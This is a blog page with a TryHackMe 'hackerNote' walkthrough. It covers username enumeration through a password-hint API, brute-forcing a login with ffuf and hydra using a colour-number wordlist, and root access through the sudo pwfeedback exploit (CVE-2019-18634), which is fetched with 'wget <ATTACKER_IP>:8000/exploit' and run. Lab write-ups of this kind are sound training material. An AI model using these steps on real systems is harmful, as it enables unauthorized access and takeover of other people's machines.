<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/">htb/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/"><b>>thm/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/archangel/">archangel/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/hackernote/"><b>>hackernote/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/hackernote/files/">files/</a></li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass/">overpass/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass2_hacked/">overpass2 hacked/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass3_hosting/">overpass3 hosting/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/the_great_escape/">the great escape/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/wreath/">wreath/</a></li>
			</ul>
		</li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Initial Information</h1>
<blockquote><p>A custom webapp, introducing username enumeration, custom wordlists and a basic privilege escalation exploit.</p>
</blockquote>
<blockquote><p><a href="https://tryhackme.com/room/hackernote">room link</a>, creator: <a href="https://tryhackme.com/p/NinjaJc01">NinjaJc01</a></p>
</blockquote>
<h1>Enumeration</h1>
<p>As always, we can start with an <code>nmap</code> scan to discover open ports on the target machine.</p>
<pre><code>$ nmap -sC -sV -p- -oN scans/tcpfull 10.10.67.60
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
|   256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_  256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp   open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home - hackerNote
8080/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home - hackerNote
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<h2>http - 80, 8080/tcp</h2>
<p>For first, we can see there are 2 web ports(80, 8080) and they are running the same service(hackerNote).
And there is one more interesting thing. The box runs a go webserver.</p>
<p>We can create a new account, log in and we can now start exploring the site's functionalities.</p>
<p>Looking into the source we can find some interesting <strong>javascript files</strong> and some <strong>api endpoints</strong>.
But nothing really out of the ordinary so we can go back a littlebit and test the login functionality.</p>
<h3>Testing the login page</h3>
<p>We know that if we provide correct credentials we get logged in and the website redirects us to /note.</p>
<p>But if we try other creds the loginpage says(when I use my username and a random password it has a little delay):</p>
<blockquote><p><em>Invalid Username Or Password</em></p>
</blockquote>
<p>If we give it only a username: <code>asd</code> it says:</p>
<blockquote><p><em>Wrong credential encoding</em></p>
</blockquote>
<p>Which is interesting behavior.</p>
<p>There is an other functionality that can be used maliciously which is the <strong>Password Reset</strong>.</p>
<p>We can give it our registered username (which is <code>asd</code> for me) and the site returns:</p>
<blockquote><p>Hint: asd</p>
</blockquote>
<p>But if we try with <code>admin</code> it doesn't return anything!</p>
<p>From this point I recommend going back to the roots and use <code>curl</code> to check what's really going on in the background. We can use <strong>devtools</strong> to copy the cURL request of the <code>I forgot my password</code> button.</p>
<pre><code>$ curl 'http://10.10.67.60/api/user/passwordhint/asd'
{&quot;hint&quot;:&quot;asd&quot;,&quot;username&quot;:&quot;asd&quot;}
</code></pre>
<ul>
<li>When I registered I used <code>asd:asd:asd</code> and that's the reason why it printed asd</li>
</ul>
<p><strong>Fuzzing the admin user's name:</strong></p>
<p>We can try use <code>ffuf</code> to fuzz the administrator's username and get his hint.</p>
<pre><code>$ ffuf -u 'http://10.10.67.60/api/user/passwordhint/FUZZ' -w /opt/SecLists/Usernames/Names/names.txt
jXXXs                   [Status: 200, Size: 74, Words: 7, Lines: 2]
</code></pre>
<ul>
<li>We got a user! So let's try getting his <strong>password hint</strong>!</li>
</ul>
<pre><code>$ curl 'http://10.10.67.60/api/user/passwordhint/jXXXs'
{&quot;hint&quot;:&quot;My favourite colour and my favourite number&quot;,&quot;username&quot;:&quot;jXXXs&quot;}
</code></pre>
<ul>
<li>The user's password consists of a <strong>color and a number</strong>!</li>
</ul>
<h1>Exploitation</h1>
<h2>Making a password list</h2>
<p>We can try to make a list of colors and generate passwords based on this color and a random number.
This is the time when <code>hashcat</code> scripts can be very handy.</p>
<ul>
<li><a href="https://github.com/hashcat/hashcat-utils/releases">github.com/hashcat/hashcat-utils/releases</a></li>
</ul>
<p>We can download the zip file and extract it then we can use <code>bin/combinator.bin</code> to combinate our colors.txt and numbers.txt file from the zip file we can download from the box's thm roompage <a href="files/wordlists.zip">local copy</a>.</p>
<ul>
<li><a href="files/wordlists.zip">files/wordlists.zip</a></li>
<li><a href="files/colors.txt">files/colors.txt</a></li>
<li><a href="files/numbers.txt">files/numbers.txt</a></li>
</ul>
<p><strong>Combining the 2 files:</strong></p>
<pre><code>$ ./combinator.bin files/colors.txt files/numbers.txt &gt; files/wordlist.txt
</code></pre>
<ul>
<li><a href="files/wordlist.txt">files/wordlist.txt</a></li>
</ul>
<h2>Cracking the password</h2>
<p>Now, we have a wordlist so we can try to get into the app! I will use <code>ffuf</code> again.
I copied the login request as cURL from my browser's devtools and cleaned up a bit.</p>
<pre><code>$ curl -L 'http://10.10.67.60/api/user/login' -d '{&quot;username&quot;:&quot;asd&quot;,&quot;password&quot;:&quot;asd&quot;}'
{&quot;status&quot;:&quot;Invalid Username Or Password&quot;}
</code></pre>
<ul>
<li><code>curl</code> returns <code>{&quot;status&quot;:&quot;Invalid Username Or Password&quot;}</code> with the correct credentials</li>
</ul>
<p>We miss some headers! So let's add those in.</p>
<pre><code>$ curl 'http://10.10.67.60/api/user/login' -d '{&quot;username&quot;:&quot;asd&quot;,&quot;password&quot;:&quot;asd&quot;}' -H 'Content-Type: application/json' -H 'Content-Type: application/x-www-form-urlencoded'
{&quot;SessionToken&quot;:&quot;51d8e345c24e9ad806a6229f1fb5ce27&quot;,&quot;status&quot;:&quot;success&quot;}
</code></pre>
<p>Now, we can use <code>ffuf</code> to brute force the password of our known user.</p>
<pre><code>$ ffuf -u 'http://10.10.67.60/api/user/login' -d '{&quot;username&quot;:&quot;jXXXs&quot;,&quot;password&quot;:&quot;FUZZ&quot;}' -H 'Content-Type: application/json' -H 'Content-Type: application/x-www-form-urlencoded' -w files/wordlist.txt
</code></pre>
<ul>
<li>But every response is the same in ffuf and wfuzz (42 chars long) :(</li>
</ul>
<p>So what can we do? We can use <code>hydra</code> instead of <code>ffuf</code> or <code>wfuzz</code>.</p>
<pre><code>$ hydra -l jXXXs -P files/wordlist.txt 10.10.67.60 http-post-form '/api/user/login':'username=^USER^&amp;password=^PASS^':'Invalid Username Or Password'
[80][http-post-form] host: 10.10.67.60   login: jXXXs   password: bXXXX
</code></pre>
<p><code>hydra</code> can be old and slower but it still finds the correct password for us!</p>
<h2>Logging into the webapp</h2>
<p>After we log into the webapp we can find a note about the target user's ssh password.</p>
<blockquote><p><strong>My SSH details</strong>
So that I don't forget, my SSH password is dXXXXXXXXb</p>
</blockquote>
<h2>Logging into ssh</h2>
<pre><code>$ ssh jXXXs@10.10.67.60
dXXXXXXXXb
jXXXs@hackernote:~$ id
uid=1001(jXXXs) gid=1001(jXXXs) groups=1001(jXXXs)
</code></pre>
<h1>Privilege Escalation from jXXXs</h1>
<p>As always we can run <code>sudo -l</code> to see if our target user can run sudo or not.
When we paste the user's password we can see these little stars
which are password length indicators.</p>
<pre><code>jXXXs@hackernote:~$ sudo -l
[sudo] password for jXXXs: **********
</code></pre>
<p>I instantly knew there is a CVE out there which makes a use of this feature if it's enabled.</p>
<ul>
<li><p><a href="https://m4t3sz.gitlab.io/posts/tryhackme/sudo_bof_pwfeedback/">m4t3sz.gitlab.io/posts/tryhackme/sudo<em>bof</em>pwfeedback/</a></p>
</li>
<li><p><a href="https://github.com/saleemrashid/sudo-cve-2019-18634">github.com/saleemrashid/sudo-cve-2019-18634</a></p>
</li>
</ul>
<p>We can use <code>git</code> to download the exploit's repo to our machine and then compile <code>exploit.c</code> with <code>gcc</code> on our <strong>local machine</strong>.</p>
<p>On <strong>local</strong> machine:</p>
<pre><code>$ git clone https://github.com/saleemrashid/sudo-cve-2019-18634
$ cd sudo-cve-2019-18634
$ gcc exploit.c -o exploit
$ python3 -m http.server 8000
</code></pre>
<p>On <strong>target</strong> machine:</p>
<pre><code>$ wget &lt;ATTACKER_IP&gt;:8000/exploit
$ chmod +x exploit
$ ./exploit
</code></pre>
<ul>
<li>From now, we should have gotten a root shell!</li>
</ul>
<p>Here's my target's terminal:</p>
<pre><code>jXXXs@hackernote:~$ wget 10.8.2.82:8000/exploit
--2021-02-05 14:12:45--  http://10.8.2.82:8000/exploit
Connecting to 10.8.2.82:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17488 (17K) [application/octet-stream]
Saving to: ‘exploit’

exploit                    100%[=====================================&gt;]  17.08K  --.-KB/s    in 0.06s

2021-02-05 14:12:45 (282 KB/s) - ‘exploit’ saved [17488/17488]

jXXXs@hackernote:~$ chmod +x exploit
jXXXs@hackernote:~$ ./exploit
[sudo] password for jXXXs:
Sorry, try again.
# id
uid=0(root) gid=0(root) groups=0(root),1001(jXXXs)
</code></pre>
<h1>Further reading - <a href="https://tryhackme.com/room/hackernote">tryhackme.com/room/hackernote</a></h1>
<h2>Timing attacks on logins</h2>
<ul>
<li><a href="https://seclists.org/fulldisclosure/2016/Jul/51">seclists.org/fulldisclosure/2016/Jul/51</a></li>
<li><a href="https://www.gnucitizen.org/blog/username-enumeration-vulnerabilities/">www.gnucitizen.org/blog/username-enumeration-vulnerabilities/</a></li>
<li><a href="https://wiki.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002)">wiki.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002)</a></li>
</ul>
<h2>Adobe Password Breach</h2>
<ul>
<li><a href="https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/">nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/</a></li>
</ul>
<h2>Sudo CVE</h2>
<ul>
<li><a href="https://dylankatz.com/Analysis-of-CVE-2019-18634/">https://dylankatz.com/Analysis-of-CVE-2019-18634/</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-18634">https://nvd.nist.gov/vuln/detail/CVE-2019-18634</a></li>
<li><a href="https://tryhackme.com/room/sudovulnsbof">https://tryhackme.com/room/sudovulnsbof</a></li>
</ul>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
